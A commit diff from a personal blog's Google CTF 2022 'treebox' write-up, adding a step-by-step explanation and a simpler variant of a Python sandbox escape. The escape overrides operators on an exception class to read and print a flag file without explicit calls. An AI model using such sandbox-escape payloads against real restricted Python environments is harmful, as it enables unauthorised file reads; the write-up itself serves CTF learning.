h/blog
1
Fork 0
mirror of https://github.com/lavafroth/lavafroth.github.io.git synced 2026-06-01 21:21:16 -03:00
Code Issues Packages Projects Releases Wiki Activity

feat: update google treebox solution with new finding

Browse Source
This commit is contained in:
Himadri Bhattacharjee
2025-09-15 19:33:07 +05:30
parent 0c1906205a
commit e4ede6af40
1 changed files with 52 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files

67
content/post/google-ctf-2022-treebox.md
View File

@@ -24,39 +24,76 @@ for name, handle in sys.modules.items():
print(f"sys.modules['{name}'].__loader__.{loader_function_name}")
```
From the output we get, this looks the most promising:
There are a lot of modules that have the `get_data` From the output we get, this looks the most promising:
```python
sys.modules["os"].__loader__.get_data
sys.modules["code"].__loader__.get_data
```
Now we can slowly assemble our exploit.
{{< collapsable-explanation >}}
```python
import sys
```
We create a class called `Read` that inherits from the `BaseException` class.
```python
class Read(BaseException):
# Set the addition operator to the str function
# so that we can use it to stringify bytes-like
# objects.
```
We define the members of the class as the following:
Set the addition operator to the `str` function to stringify bytes-like
objects.
```python
__add__ = str
```
# Set the division operator to os.loader.get_data method
# which can be used to read the raw bytes from a file.
__truediv__ = sys.modules["os"].__loader__.get_data
Set the division operator to os.loader.get_data method
which can be used to read the raw bytes from a file.
```python
__truediv__ = sys.modules["code"].__loader__.get_data
```
# Set the indexing operator to print, which we'll use to
# print the flag
Set the indexing operator to print, which we'll use to print the flag
```python
__getitem__ = print
```
Now we need to detonate these operators without calling a function.
The best way is to define an `__init__` constructor method that is called implicitly when the
class is created.
Through this, we read the raw bytes of the file "flag" stringify it and finally print it.
```python
def __init__(self):
self[self + self / "flag"]
```
# Now we read the raw bytes of the file "flag"
# stringify it and finally print it
With all of that setup out of the way, we can instantiate the class by raising it as an exception.
```python
raise Read
```
{{< / collapsable-explanation >}}
### Update: 2025-09-15
I was lurking through my past writeups, here's an ever easier way to achieve the same file read
without importing the `sys` module.
```python
class Read(BaseException):
__add__ = list
__truediv__ = open
__getitem__ = print
def __init__(self):
self[self + self / "flag"]
# Raise the exception
raise Read
```